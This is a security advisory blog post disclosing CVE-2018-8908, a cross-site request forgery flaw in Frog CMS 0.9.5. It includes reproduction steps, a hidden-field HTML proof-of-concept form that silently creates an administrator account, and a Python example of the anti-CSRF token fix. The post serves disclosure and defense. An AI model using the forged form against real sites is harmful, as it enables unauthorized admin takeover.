By: Samrat Das
Recently, while performing an open source security assessment, I came across a CMS application, "Frog CMS". Curious to explore its functionality, I set up a local copy and started playing around to find security vulnerabilities.
Title of the Vulnerability: Cross Site Request Forgery
Vulnerability Class: Code Execution/ Privilege Escalation
Technical Details & Description: The application source code allows a malicious HTML request to be executed without verifying the source of the request. A crafted request submitted through a logged-in administrator's browser therefore results in the creation of a privileged user.
CVE ID allocated: CVE-2018-8908
Product & Service Introduction: Frog CMS
Steps to Reproduce:
1. Visit the application
2. Visit the Add Users Page.
3. Craft an html page with all the details for an admin user creation and host it on a server
4. When a logged-in admin user clicks the link, another admin user is created immediately.
Exploitation Technique: An attacker can create a rogue admin user to gain access to the application.
Severity Level: High
The presence of such a risk can lead to user data compromise as well as privileged user access.
Proof of Concept (HTML form submitted from an attacker-controlled page):
<form action="http://localhost/frog/admin/?/user/add" method="POST">
  <input type="hidden" name="user[name]" value="Test_1" />
  <input type="hidden" name="user[email]" value="" />
  <input type="hidden" name="user[username]" value="test" />
  <input type="hidden" name="user[password]" value="test" />
  <input type="hidden" name="user[confirm]" value="test" />
  <input type="hidden" name="user_permission[administrator]" value="1" />
  <input type="hidden" name="commit" value="Save" />
  <input type="submit" value="Submit request" />
</form>
Affected Product Version: Frog CMS 0.9.5
Solution - Fix & Patch: The application should implement an anti-CSRF token on state-changing forms such as Add User and reject any request whose token is missing or does not match the logged-in session, so that forged cross-site requests are filtered out.
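The token check described above, as an added Python example (not Frog CMS code, which is PHP): tokens are bound to the admin's session with an HMAC, and a hypothetical handler for the /user/add POST refuses to create the user when the token is absent or wrong. The session id, the server secret and the forged request dictionary are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Mint a token bound to the logged-in session: nonce + HMAC(secret, session:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(token, session_id: str, secret: bytes) -> bool:
    """True only if the token was minted for this session; comparison is constant-time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def hidden_token_field(token: str) -> str:
    """Hidden input the legitimate Add User page must embed next to the user[...] fields."""
    return f'<input type="hidden" name="csrf_token" value="{token}" />'


def handle_user_add(form: dict, session_id: str, secret: bytes) -> tuple:
    """Hypothetical guard for the /user/add POST handler: verify the token before any write."""
    if not verify_csrf_token(form.get("csrf_token"), session_id, secret):
        return 403, "rejected: missing or invalid CSRF token"
    if form.get("user[password]") != form.get("user[confirm]"):
        return 400, "rejected: password confirmation mismatch"
    return 200, "created user %s (administrator=%s)" % (
        form.get("user[username]"), form.get("user_permission[administrator]"))


# Constructed request mirroring the advisory's form. A page on another origin cannot read
# the victim's token, so its POST carries every user[...] field but no csrf_token.
FORGED_FORM = {
    "user[name]": "Test_1", "user[email]": "", "user[username]": "test",
    "user[password]": "test", "user[confirm]": "test",
    "user_permission[administrator]": "1", "commit": "Save",
}
SECRET = secrets.token_bytes(32)  # per-deployment server secret, constructed here

if __name__ == "__main__":
    print(handle_user_add(FORGED_FORM, "victim-admin-session", SECRET))  # 403
    token = issue_csrf_token("victim-admin-session", SECRET)
    print(handle_user_add({**FORGED_FORM, "csrf_token": token}, "victim-admin-session", SECRET))  # 200
```

The secret must stay server-side and be generated once per deployment; a token minted for one session is rejected for every other session, which is what makes the forged request fail even when every user[...] field is correct.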